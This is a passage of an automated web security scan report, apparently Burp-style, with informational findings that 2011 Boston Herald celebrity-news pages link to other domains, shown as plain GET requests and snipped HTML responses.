<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/track/star_tracks/view/20110128startracks/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/67bc6f_beebs_01282011.jpg" alt="Justin Bieber."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/a2c141_kate_01282011.jpg" alt="Kate Hudson."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/98db3d_stew_01282011.jpg" alt="Kristen Stewart"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127star_tracks/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/d842d2_Cruz_01272011.jpg" alt="Javier Bardem and Penelope Cruz"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/ceceaa_Bristol_02242010.jpg" alt="Bristol Palin"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127vince_neil_gets_15_days_for_dui/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/533087_Neil_01272011.jpg" alt="Motley Crue singer Vince Neil"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127complicated_custody_battle_for_padma_lakshmi/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/d0a387_Padma_01272011.jpg" alt="Padma Lakshmi "></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127cheryl_burke_reveals_childhood_abuse/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/55954d_Burke_11052009.jpg" alt="Cheryl Burke"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110127kate_middleton_and_prince_william_break_out_fax_machine/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/217acb_Prince_01192011.jpg" alt="Kate Middleton and Prince William"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110125lady_gaga_is_the_queen_of_social_networks/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/7015f7_gaga_12242010.jpg" alt="Lady GaGa"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110125keith_olbermann_may_write_for_cable_news_show/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/a146ce_keith_01252011.jpg" alt="Keith Olbermann."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20110125bret_michaels_to_have_surgery_again/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/abc7a8_brett_01252011.jpg" alt="Bret Michaels."></a>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.163. http://bostonherald.com/track/star_tracks/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/view.bg

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /track/star_tracks/view.bg?articleid=1312549&format=comments&srvc=track&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 67934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Star Tracks - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/star_tracks/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110128startracks%2Fformat%3Dcomments%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(4) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Justin Bieber sings PETA&rsquo;s praises');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982415,5,0);" ><img id="thumb_up_1982415" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982415,1,0);"><img id="thumb_down_1982415" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982415, 'bfocus');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&format=comments&cnum=1&at_comment=1982415#cnum1982415"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982415','/track/star_tracks/view.bg?articleid=1312549&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1983296,5,0);" ><img id="thumb_up_1983296" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1983296,1,0);"><img id="thumb_down_1983296" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1983296, 'herkbabe');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&format=comments&cnum=1&at_comment=1983296#cnum1983296"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1983296','/track/star_tracks/view.bg?articleid=1312549&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1983314,5,0);" ><img id="thumb_up_1983314" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1983314,1,0);"><img id="thumb_down_1983314" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1983314, 'needham');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&format=comments&cnum=1&at_comment=1983314#cnum1983314"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1983314','/track/star_tracks/view.bg?articleid=1312549&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1983547,5,0);" ><img id="thumb_up_1983547" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1983547,1,0);"><img id="thumb_down_1983547" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1983547, 'JulieTheJarhead');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&format=comments&cnum=1&at_comment=1983547#cnum1983547"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1983547','/track/star_tracks/view.bg?articleid=1312549&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a class="LinksRedNone" style="text-decoration:underline" href="http://www.heraldmedia.com/privacy.html" target="_new">Privacy commitment</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(4) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/67bc6f_beebs_01282011.jpg" alt="Justin Bieber." /></div>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.164. http://bostonherald.com/track/star_tracks/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/view.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /track/star_tracks/view.bg?articleid=1312549&srvc=track&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Star Tracks - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/star_tracks/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110128startracks%2Fsrvc%3Dtrack%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(4) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Justin Bieber sings PETA&rsquo;s praises');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312549&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(4) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/67bc6f_beebs_01282011.jpg" alt="Justin Bieber." /></div>
